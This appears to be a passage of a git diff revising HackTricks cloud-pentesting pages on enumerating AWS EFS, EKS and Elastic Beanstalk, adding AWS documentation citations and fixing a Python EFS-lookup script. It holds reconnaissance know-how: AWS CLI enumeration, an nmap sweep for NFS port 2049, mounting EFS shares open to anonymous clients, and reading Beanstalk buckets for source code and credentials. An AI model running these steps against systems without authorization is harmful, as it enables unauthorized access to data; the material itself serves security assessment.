+- [18] [Amazon ECS Agent network-interface model](https://raw.githubusercontent.com/aws/amazon-ecs-agent/master/ecs-agent/netlib/model/networkinterface/networkinterface.go)
+- [19] [Best practices for IAM roles in Amazon ECS](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/security-iam-roles.html)
+- [20] [Amazon ECS task definitions](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task_definitions.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md
@@ -1,24 +1,24 @@
 # AWS - EFS Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## EFS
 
 ### Basic Information
 
-Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms.
+Amazon Elastic File System (EFS) provides **serverless, fully elastic file storage** that can grow automatically as files are added or removed. It is designed for highly scalable, highly available, and highly durable workloads, with low-latency access and high-throughput options. It supports NFSv4.0 and NFSv4.1 and can be accessed by compute services including EC2, ECS, EKS, Lambda, and Fargate.<sup>[[1]](#references)</sup>
 
-By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**.
+A newly created EFS file system has only one root directory, **`/`**. A mount can target another existing directory, and an access point can expose its configured root path as `/` to the client.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### Network Access
 
-An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**.
+An EFS file system is accessed from a VPC through one or more **mount targets**. A Regional file system can have one mount target per Availability Zone, and instances in any subnet in that Availability Zone can share it; a mount target is not automatically created in every subnet.<sup>[[4]](#references)</sup>
 
-Without this, you **won't be able to contact the NFS service**.
+To give an EC2 instance (or another VPC client) access, allow inbound TCP **2049** on the mount target's security group from the client's security group and allow the client's outbound traffic to the mount target; routing and network ACLs must also permit the connection.<sup>[[5]](#references)</sup>
 
-For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
+Without this network path, the client cannot contact the NFS service or complete the mount.<sup>[[5]](#references)</sup> For a community troubleshooting example involving an EFS mount timeout and security-group configuration, see [AWS EFS connection timeout at mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount).<sup>[[6]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI operations below inventory file systems and policies, mount targets and their security groups, EC2 security groups, access points, and replication configurations.<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 # Get filesystems and access policies (if any)
@@ -36,14 +36,16 @@ aws efs describe-access-points
 # Get replication configurations
 aws efs describe-replication-configurations
 
-# Search for NFS in EC2 networks
-sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure
+# Search for NFS only within an authorized VPC/subnet CIDR
+sudo nmap -T4 -Pn -p 2049 --open <authorized-cidr>
 ```
 
 > [!CAUTION]
-> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**.
+> Mount targets can be in different subnets and Availability Zones. Prefer inventorying them through the EFS API; if network scanning is necessary, cover only the authorized VPC CIDR blocks or subnets rather than assuming every VPC uses a `/16`.<sup>[[4]](#references)[[9]](#references)</sup>
 
 ### Mount EFS
+
+AWS recommends the EFS mount helper from `amazon-efs-utils`; standard Linux NFS clients are also supported with NFSv4.0 and NFSv4.1. The examples below show both approaches.<sup>[[14]](#references)</sup>
 
 ```bash
 sudo mkdir /efs
@@ -61,22 +63,25 @@ sudo mount -t efs <file-system-id/EFS DNS name>:/ /efs/
 
 ### IAM Access
 
-By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. However, File System policies could be in place **only allowing principals with specific permissions** to access it.\
-For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**:
+When no user-configured file-system policy is in effect, the default EFS policy does not use IAM authentication and grants full client access to any anonymous client that can connect through a mount target. EFS also disables root squashing by default, so UID 0 is treated as root; ordinary users remain subject to the file system's POSIX permissions.<sup>[[2]](#references)[[15]](#references)</sup>
+
+A configured file-system policy can restrict the client actions `ClientMount` (read-only), `ClientWrite`, and `ClientRootAccess`.<sup>[[15]](#references)</sup> For example, the following valid resource-policy statement grants mount/read and write access to the named IAM role and requires the connection to use a mount target. It does not grant those actions to other principals, although any applicable identity-based IAM policies must also be evaluated.<sup>[[15]](#references)[[16]](#references)</sup>
 
 ```json
 {
   "Version": "2012-10-17",
-  "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797",
   "Statement": [
     {
-      "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5",
+      "Sid": "AllowEfsClientRole",
       "Effect": "Allow",
       "Principal": {
-        "AWS": "*"
+        "AWS": "arn:aws:iam::123456789012:role/EfsClient"
       },
-      "Action": "",
-      "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018",
+      "Action": [
+        "elasticfilesystem:ClientMount",
+        "elasticfilesystem:ClientWrite"
+      ],
+      "Resource": "arn:aws:elasticfilesystem:us-east-1:123456789012:file-system/fs-0123456789abcdef0",
       "Condition": {
         "Bool": {
           "elasticfilesystem:AccessedViaMountTarget": "true"
@@ -87,26 +92,26 @@ For example, this File System policy **won't allow even to mount** the file syst
 }
 ```
 
-Or this will **prevent anonymous access**:
+The EFS console also provides a **Prevent anonymous access** option; AWS documents that this removes `ClientMount` from the set of allowed EFS actions.<sup>[[17]](#references)</sup>
 
 <figure><img src="../../../images/image (278).png" alt=""><figcaption></figcaption></figure>
 
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command:
+To use IAM authorization, you must use the EFS mount helper with the `efs` file-system type. With an EC2 instance profile, use `tls,iam`; with a named AWS profile, add `awsprofile=<name>`.<sup>[[15]](#references)[[18]](#references)</sup>
 
 ```bash
 sudo mkdir /efs
 sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/
-# To use a different pforile from ~/.aws/credentials
+# To use a different profile from ~/.aws/credentials
 # You can use: -o tls,iam,awsprofile=namedprofile
 ```
 
 ### Access Points
 
-**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets.
+**Access points** are **application-specific entry points into an EFS file system** that make it easier to manage application access to shared datasets. They can enforce a POSIX user and group identity and a different root directory for requests made through the access point.<sup>[[19]](#references)[[21]](#references)</sup>
 
-When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data.
+When you create an access point, you can **specify the owner and POSIX permissions** for a root directory that EFS creates when needed. You can also **define a custom root directory** by specifying its path; if the path does not exist, creation metadata is required. This allows you to **control access to your EFS file system on a per-application or per-user basis**.<sup>[[3]](#references)[[21]](#references)</sup>
 
-**You can mount the File System from an access point with something like:**
+**You can mount the file system from an access point with something like:** The access-point form requires the EFS mount helper and `tls`; add `iam` when IAM authorization is enabled.<sup>[[19]](#references)[[20]](#references)</sup>
 
 ```bash
 # Use IAM if you need to use iam permissions
@@ -115,17 +120,17 @@ sudo mount -t efs -o tls,[iam],accesspoint=<access-point-id> \
 ```
 
 > [!WARNING]
-> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it.
+> An access-point mount still needs a mount target and a working network path to NFS, and any file-system policy or IAM authorization must allow the client to mount it.<sup>[[5]](#references)[[15]](#references)[[19]](#references)</sup>
 
 Access points can be used for the following purposes:
 
-- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions.
-- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification.
-- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications.
+- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can manage access for different applications or users without changing the underlying file system's permissions.<sup>[[21]](#references)</sup>
+- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder.<sup>[[3]](#references)[[19]](#references)</sup>
+- **Easier file system access**: Access points can be used with AWS Lambda functions and ECS tasks, including Fargate workloads, to simplify file-system access for serverless and containerized applications.<sup>[[22]](#references)[[23]](#references)[[24]](#references)</sup>
 
 ## EFS IP address
 
-Using the information related to the EFS IP address, the following Python script can assist in retrieving details about the EFS system. This information is useful for building the mount system command or performing further enumeration with knowledge of the subnet ID. Additionally, the script shows access points, which can be valuable when the root directory or primary mount path is restricted. In such cases, the access points provide alternative paths to access sensitive information
+The following Python script combines the EC2 network-interface lookup with EFS file-system, mount-target, policy, mount-target security-group, and access-point APIs to map an EFS IP address to its associated metadata.<sup>[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[12]](#references)[[25]](#references)</sup> This information is useful for building the mount command or continuing enumeration with the subnet ID. Because access points can expose an application-specific root path, their metadata can also reveal an alternate path when the default root is restricted.<sup>[[3]](#references)[[19]](#references)</sup>
 
 ```bash
 Usage: python efs_ip_enum.py <IP_ADDRESS>
@@ -175,9 +180,20 @@ def get_efs_info(ip_address):
                 for mt in mount_targets:
                     if mt['NetworkInterfaceId'] == network_interface_id:
                         try:
+                            security_groups = efs_client.describe_mount_target_security_groups(
+                                MountTargetId=mt['MountTargetId']
+                            ).get('SecurityGroups', [])
+                        except Exception as e:
+                            print(f"[!] Error retrieving security groups for {mt['MountTargetId']}: {str(e)}")
+                            security_groups = []
+
+                        try:
                             policy = efs_client.describe_file_system_policy(FileSystemId=fs_id).get('Policy', 'No policy attached')
                         except Exception as e:
-                            policy = f"Error retrieving policy: {str(e)}"
+                            if getattr(e, 'response', {}).get('Error', {}).get('Code') == 'PolicyNotFound':
+                                policy = 'No policy attached (default policy)'
+                            else:
+                                policy = f"Error retrieving policy: {str(e)}"
 
                         print("[+] Found matching EFS File System:\n")
                         print(f"    FileSystemId: {fs_id}")
@@ -185,7 +201,7 @@ def get_efs_info(ip_address):
                         print(f"    DNSName: {fs_id}.efs.{session.region_name}.amazonaws.com")
                         print(f"    LifeCycleState: {mt['LifeCycleState']}")
                         print(f"    SubnetId: {mt['SubnetId']}")
-                        print(f"    SecurityGroups: {', '.join(mt.get('SecurityGroups', [])) if mt.get('SecurityGroups') else 'None'}")
+                        print(f"    SecurityGroups: {', '.join(security_groups) if security_groups else 'None'}")
                         print(f"    Policy: {policy}\n")
 
                         try:
@@ -215,7 +231,7 @@ def get_efs_info(ip_address):
 
 if __name__ == "__main__":
     if len(sys.argv) != 2:
-        print("Usage: python efs_enum.py <IP_ADDRESS>")
+        print("Usage: python efs_ip_enum.py <IP_ADDRESS>")
         sys.exit(1)
 
     ip_address = sys.argv[1]
@@ -241,8 +257,32 @@ if __name__ == "__main__":
 ../aws-persistence/aws-efs-persistence/README.md
 {{#endref}}
 
+## References
+
+- [1] [What is Amazon Elastic File System?](https://docs.aws.amazon.com/efs/latest/ug/whatisefs.html)
+- [2] [Network File System (NFS) level users, groups, and permissions](https://docs.aws.amazon.com/efs/latest/ug/accessing-fs-nfs-permissions.html)
+- [3] [Enforcing a root directory with an access point](https://docs.aws.amazon.com/efs/latest/ug/enforce-root-directory-access-point.html)
+- [4] [Managing mount targets](https://docs.aws.amazon.com/efs/latest/ug/accessing-fs.html)
+- [5] [Using VPC security groups](https://docs.aws.amazon.com/efs/latest/ug/network-access.html)
+- [6] [AWS EFS connection timeout at mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount)
+- [7] [describe-file-systems — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-file-systems.html)
+- [8] [describe-file-system-policy — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-file-system-policy.html)
+- [9] [describe-mount-targets — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-mount-targets.html)
+- [10] [describe-mount-target-security-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-mount-target-security-groups.html)
+- [11] [describe-security-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-security-groups.html)
+- [12] [describe-access-points — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-access-points.html)
+- [13] [describe-replication-configurations — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/efs/describe-replication-configurations.html)
+- [14] [Mounting EFS file systems](https://docs.aws.amazon.com/efs/latest/ug/mounting-fs.html)
+- [15] [Using IAM to control access to file systems](https://docs.aws.amazon.com/efs/latest/ug/iam-access-control-nfs-efs.html)
+- [16] [Resource-based policy examples for Amazon EFS](https://docs.aws.amazon.com/efs/latest/ug/security_iam_resource-based-policy-examples.html)
+- [17] [Creating file system policies](https://docs.aws.amazon.com/efs/latest/ug/create-file-system-policy.html)
+- [18] [Mounting with IAM authorization](https://docs.aws.amazon.com/efs/latest/ug/mounting-IAM-option.html)
+- [19] [Working with access points](https://docs.aws.amazon.com/efs/latest/ug/efs-access-points.html)
+- [20] [Mounting with EFS access points](https://docs.aws.amazon.com/efs/latest/ug/mounting-access-points.html)
+- [21] [Enforcing a user identity using an access point](https://docs.aws.amazon.com/efs/latest/ug/enforce-identity-access-points.html)
+- [22] [Configuring Amazon EFS file system access](https://docs.aws.amazon.com/lambda/latest/dg/configuration-filesystem-efs.html)
+- [23] [Specify an Amazon EFS file system in an Amazon ECS task definition](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/specify-efs-config.html)
+- [24] [Amazon ECS task definition differences for Fargate](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/fargate-tasks-services.html)
+- [25] [describe-network-interfaces — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-network-interfaces.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md
@@ -1,19 +1,19 @@
 # AWS - EKS Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## EKS
 
-Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS.
+Amazon Elastic Kubernetes Service (Amazon EKS) is a managed Kubernetes service that simplifies deploying, managing, and scaling containerized applications in AWS. In standard EKS mode, AWS manages the Kubernetes control plane; EKS Auto Mode extends that management to the nodes and automates infrastructure provisioning, scaling, optimization, and operating-system patching.<sup>[[1]](#references)[[2]](#references)</sup>
 
 Key aspects of Amazon EKS include:
 
-1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates.
-2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security.
-3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design.
-4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment.
+1. **Managed Kubernetes Control Plane**: EKS manages the control plane, while Auto Mode also manages nodes and provides automated patching and scaling.<sup>[[2]](#references)[[3]](#references)</sup>
+2. **Integration with AWS Services**: EKS integrates Kubernetes clusters with AWS services for compute, storage, databases, and security capabilities.<sup>[[1]](#references)[[2]](#references)[[14]](#references)</sup>
+3. **Scalability and Security**: EKS automates infrastructure management and provides automatic capacity and scaling in a highly available, secure environment; its managed control plane runs in an AWS-managed VPC with redundant paths.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+4. **Compatibility with Kubernetes**: EKS is certified Kubernetes-conformant, so Kubernetes-compatible applications and community tooling can be used without refactoring.<sup>[[2]](#references)[[3]](#references)</sup>
 
 #### Enumeration
+
+Use the following AWS CLI operations to enumerate clusters and inspect their control-plane endpoint settings, Fargate profiles, identity-provider configurations, managed node groups, and update records. The `describe-cluster` response includes `endpointPublicAccess` and `publicAccessCidrs`, which are useful when checking whether and from where the Kubernetes API endpoint is publicly reachable.<sup>[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 aws eks list-clusters
@@ -24,7 +24,7 @@ aws eks list-fargate-profiles --cluster-name <cluster_name>
 aws eks describe-fargate-profile --cluster-name <cluster_name> --fargate-profile-name <prof_name>
 
 aws eks list-identity-provider-configs --cluster-name <cluster_name>
-aws eks describe-identity-provider-config --cluster-name <cluster_name> --identity-provider-config <p_config>
+aws eks describe-identity-provider-config --cluster-name <cluster_name> --identity-provider-config type=oidc,name=<p_config>
 
 aws eks list-nodegroups --cluster-name <c_name>
 aws eks describe-nodegroup --cluster-name <c_name> --nodegroup-name <n_name>
@@ -41,10 +41,19 @@ aws eks describe-update --name <name> --update-id <id>
 
 ## References
 
-- [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/)
+- [1] [Amazon EKS](https://aws.amazon.com/eks/)
+- [2] [What is Amazon EKS?](https://docs.aws.amazon.com/eks/latest/userguide/what-is-eks.html)
+- [3] [EKS Control Plane](https://docs.aws.amazon.com/eks/latest/best-practices/control-plane.html)
+- [4] [AWS CLI `list-clusters` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/list-clusters.html)
+- [5] [AWS CLI `describe-cluster` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/describe-cluster.html)
+- [6] [AWS CLI `list-fargate-profiles` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/list-fargate-profiles.html)
+- [7] [AWS CLI `describe-fargate-profile` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/describe-fargate-profile.html)
+- [8] [AWS CLI `list-identity-provider-configs` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/list-identity-provider-configs.html)
+- [9] [AWS CLI `describe-identity-provider-config` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/describe-identity-provider-config.html)
+- [10] [AWS CLI `list-nodegroups` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/list-nodegroups.html)
+- [11] [AWS CLI `describe-nodegroup` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/describe-nodegroup.html)
+- [12] [AWS CLI `list-updates` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/list-updates.html)
+- [13] [AWS CLI `describe-update` command reference](https://docs.aws.amazon.com/cli/latest/reference/eks/describe-update.html)
+- [14] [Amazon EKS architecture](https://docs.aws.amazon.com/eks/latest/userguide/eks-architecture.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md
@@ -1,72 +1,73 @@
 # AWS - Elastic Beanstalk Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Elastic Beanstalk
 
-Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS.
+Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS.<sup>[[1]](#references)</sup>
 
-Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code.
+Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code.<sup>[[1]](#references)</sup>
 
-The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2:
+The infrastructure created by Elastic Beanstalk is managed by **Auto Scaling** groups in **EC2** (with a load balancer in load-balanced environments). If you **compromise the host**, you should also review the EC2 material.<sup>[[1]](#references)</sup>
 
 {{#ref}}
 aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
-Moreover, if Docker is used, it’s possible to use **ECS**.
+For Docker deployments, the standard Docker platform runs containers on EC2 instances, while the ECS-managed Docker branches use Amazon ECS to coordinate container tasks. Check the ECS material when the environment uses an ECS-managed branch.<sup>[[2]](#references)</sup>
 
 {{#ref}}
-aws-eks-enum.md
+aws-ecs-enum.md
 {{#endref}}
 
 ### Application & Environments
 
-In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process.
+In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process.<sup>[[3]](#references)</sup>
 
 #### Application
 
-- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.
-- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources.
-- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.
+- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity.<sup>[[3]](#references)[[4]](#references)</sup>
+- When you create an application, you provide a name and **description, but no environment resources are provisioned** at this stage. It is simply a way to organize and manage your code and related resources.<sup>[[4]](#references)</sup>
+- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments.<sup>[[3]](#references)</sup>
 
 #### Environment
 
-- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration.
-- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production.
-- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings.
+- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, Auto Scaling groups, or databases) based on the environment configuration.<sup>[[3]](#references)</sup>
+- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production.<sup>[[3]](#references)</sup>
+- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings.<sup>[[3]](#references)[[7]](#references)</sup>
 
 ### 2 types of Environments
 
-1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability.
-2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes.
+1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. A load-balanced web environment provisions resources such as **EC2 instances, load balancers, and Auto Scaling** groups to handle incoming traffic, manage capacity, and improve availability.<sup>[[5]](#references)</sup>
+2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and Auto Scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### Security
 
-When creating an App in Beanstalk there are 3 very important security options to choose:
+When creating an application environment in Beanstalk, there are three important security options to review:<sup>[[7]](#references)</sup>
 
-- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app
-- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**)
-  - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
-- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role.
-  - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions)
+- **EC2 key pair**: This is the optional **SSH key** used to log in to the EC2 instances running the application.<sup>[[7]](#references)</sup>
+- **IAM instance profile**: This is the **instance profile** attached to the EC2 instances and therefore the source of their **IAM privileges**.<sup>[[7]](#references)[[8]](#references)</sup>
+  - Older accounts may already have the default profile **`aws-elasticbeanstalk-ec2-role`**, but Elastic Beanstalk no longer creates that profile automatically for new accounts. Inspect the actual role and attached policies instead of assuming a fixed permission set.<sup>[[8]](#references)</sup>
+  - The standard managed policies are [AWSElasticBeanstalkWebTier](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkWebTier.html), [AWSElasticBeanstalkMulticontainerDocker](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkMulticontainerDocker.html), and [AWSElasticBeanstalkWorkerTier](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkWorkerTier.html). They grant different permissions for web-tier S3/log access, ECS-managed Docker tasks, and worker-tier SQS, DynamoDB, metrics, and log operations; they are not a blanket grant over every named service.<sup>[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)</sup>
+- **Service role**: This is the **role that Elastic Beanstalk assumes** to call other AWS services on the environment's behalf.<sup>[[12]](#references)</sup>
+  - The console and EB CLI commonly create or use **`aws-elasticbeanstalk-service-role`** with [AWSElasticBeanstalkEnhancedHealth](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkEnhancedHealth.html) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy.html). Whether another IAM principal can assume or pass this role depends on its trust and permission policies; do not infer that from the role name alone.<sup>[[7]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
 
-By default **metadata version 1 is disabled**:
+IMDSv1 remains supported on Elastic Beanstalk platforms running Amazon Linux 2, Amazon Linux 2023, and Windows Server. Set the `DisableIMDSv1` environment option to `true` to enforce IMDSv2, and verify the setting during an assessment rather than assuming it is disabled:<sup>[[15]](#references)</sup>
 
 <figure><img src="../../../images/image (103).png" alt=""><figcaption></figcaption></figure>
 
 ### Exposure
 
-Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk-<region>-<acc-id>`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**.
+By default, Elastic Beanstalk creates an encrypted **S3 bucket** named **`elasticbeanstalk-<region>-<acc-id>`** for each region where you create environments. It stores configuration data and uploaded **application source bundles** in this account-owned bucket.<sup>[[16]](#references)</sup>
 
-The **URL** of the created webpage is **`http://<webapp-name>-env.<random>.<region>.elasticbeanstalk.com/`**
+The default environment URL is **`http(s)://<cname-prefix>.<region>.elasticbeanstalk.com/`**. If no CNAME prefix is supplied, Elastic Beanstalk generates one by appending a random alphanumeric string to the environment name.<sup>[[17]](#references)[[18]](#references)</sup>
 
 > [!WARNING]
-> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it
+> If you get **read access** over the bucket, you can **read the source code**.<sup>[[16]](#references)</sup> Any credentials that developers stored in the bundle may also be exposed.
